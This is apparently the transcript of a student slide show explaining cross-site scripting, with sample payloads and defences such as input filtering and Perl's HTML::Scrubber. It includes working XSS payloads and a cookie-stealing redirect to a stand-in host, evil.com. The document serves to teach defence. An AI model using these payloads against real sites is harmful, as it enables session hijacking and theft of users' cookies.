cross site scripting augusta for matrix session
DESCRIPTION
this slide show tells about XSS attacks its various levels and ways to protect from themTRANSCRIPT
By :
Augusta
http://www.steve.org.uk/Hacks/XSS/index.html
XSS attacks /cross site scripting almost always focus upon sites which
use cookies for storing your username and password
Open Web Application Security Project's (OWASP) top 10 list of exploited vulnerabilities
to steal the cookie of a user of the site Steal in this context means get a copy of,
rather than removing the original
<script> alert(document.cookie); </script>
<script> alert(document.cookie); </script>
submit
Basic filtered input
<script and script> are filtered…. deleted
They found some other way to avoid dependence on javascript tag
Other ways of calling Javascript <ahref="javascript:alert(document.c
ookie);">Click me</a> <a href="advanced.html"
onClick="alert(document.cookie)">test</a>
I can run script, what now?
you don't want to have people viewing the popup boxes all day!
you want to do something more useful?
redirect the user This would allow you to record the users
cookie for later (ab)use <script> document.location =
'http://evil.com/blah.cgi?cookie=' + document.cookie; </script>
This would redirect the user to a CGI script called 'blah.cgi' on a website 'evil.com'.
The CGI script gets given the cookie of the innocent user as a parameter called 'cookie'
To next level
Using the onClick handler you have to rely upon the user clicking on a link you have placed
user will not click it, so what then?
use another method onMouseOver
this allows you to have code executed when the mouse pointer merely moves over a link
<a href="whatnow.html" onMouseOver="alert(document.cookie);">Test</a>
best defense against XSS attacks??1. good filtering of input --If you allow users to send
messages to each other, for example, you really must filter all input from the sender to make sure it's secure
Some sites will allow you to enter a URL, then they will display it as a clickable link such as:
<a href="URI">URI</a>
<a href="http://foocome" onMouseOver="alert(document.cookie)">http://foocome" onMouseOver="alert(document.cookie)</a>
2. Use HTML scrubber- A good Perl module for filtering all input
read this:
http://search.cpan.org/~podmaster/HTML- Scrubber-0.08/Scrubber.pm
Pearl code
#!/usr/bin/perl -w use HTML::Scrubber; use strict; # my $html = q[ <style type="text/css"> BAD { background: #666; color: #666;} </style> <script language="javascript"> alert("Hello, I am EVIL!"); </script> <HR> a => <a href=1>link </a> br => <br> b => <B> bold </B> u => <U> UNDERLINE </U> ]; # my $scrubber = HTML::Scrubber->new( allow => [ qw[ p b i u hr br ] ] ); # # print $scrubber->scrub($html); # # $scrubber->deny( qw[ p b i u hr br ] ); # # print $scrubber->scrub($html); # #
I wasn't satisfied with HTML::Sanitizer because it is based on HTML::TreeBuilder, so I thought I'd write something similar that works directly with HTML::Parser
3. new W3C draft on mozilla firefox4. Ms patch :: crsscri
Just another point of view!!! XSS is bad or good?? Who are you to decide?? What about mash ups 99acre and googlemap!!!
Thank you so much. I am honored by your presence.